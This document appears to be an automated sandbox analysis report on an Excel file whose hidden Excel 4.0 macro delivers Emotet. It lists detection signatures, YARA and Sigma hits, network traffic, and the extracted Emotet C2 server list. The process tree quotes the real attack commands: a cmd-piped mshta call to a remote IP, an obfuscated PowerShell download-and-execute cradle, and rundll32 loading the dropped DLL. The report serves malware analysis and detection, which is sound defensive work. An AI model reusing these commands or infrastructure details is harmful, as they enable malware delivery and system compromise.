
Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name: DOCUMENT_2801.xls
Analysis ID: 562416
MD5: 3f397d9cca325167d86d575896d40207
SHA1: 54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256: f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 572 cmdline: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2668 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2672 cmdline: cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • mshta.exe (PID: 2696 cmdline: mshta http://91.240.118.172/ee/ss/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
          • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
            • cmd.exe (PID: 1868 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
              • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1124 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source: DOCUMENT_2801.xls; Rule: SUSP_Excel4Macro_AutoOpen; Description: Detects Excel4 macro use with auto open / close; Author: John Lambert @JohnLaTwC; Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: DOCUMENT_2801.xls; Rule: JoeSecurity_XlsWithMacro4; Description: Yara detected Xls With Macro 4.0; Author: Joe Security
Source: C:\Users\user\Desktop\DOCUMENT_2801.xls; Rule: SUSP_Excel4Macro_AutoOpen; Description: Detects Excel4 macro use with auto open / close; Author: John Lambert @JohnLaTwC; Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\DOCUMENT_2801.xls; Rule: JoeSecurity_XlsWithMacro4; Description: Yara detected Xls With Macro 4.0; Author: Joe Security
Source: C:\ProgramData\Milossd.dll; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 17.2.rundll32.exe.27d0000.7.unpack; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 14.2.rundll32.exe.25b0000.9.unpack; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 17.2.rundll32.exe.3090000.27.unpack; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 17.2.rundll32.exe.2f70000.23.unpack; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security
Source: 13.2.rundll32.exe.3c0000.0.unpack; Rule: JoeSecurity_Emotet_1; Description: Yara detected Emotet; Author: Joe Security

                            System Summary

                            Source: File created; Author: Florian Roth; Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process started; Author: Florian Roth; Data: Command: mshta http://91.240.118.172/ee/ss/se.html , CommandLine: mshta http://91.240.118.172/ee/ss/se.html , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2672, ProcessCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ProcessId: 2696
                            Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 684, ProcessCommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, ProcessId: 572
                            Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process started; Author: Florian Roth; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708


                            AV Detection

                            Source: 17.2.rundll32.exe.3090000.27.unpack; Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                            Source: DOCUMENT_2801.xls; ReversingLabs: Detection: 16%
                            Source: tamiladsense.com; Virustotal: Detection: 7%
                            Source: C:\ProgramData\Milossd.dll; Joe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 17_2_0035BAEA FindFirstFileW,

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global traffic; DNS query: name: tamiladsense.com
                            Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

                            Networking

                            Source: Traffic; Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 74.207.230.120 144
                            Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 139.196.72.155 144
                            Source: global traffic; HTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global traffic; HTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
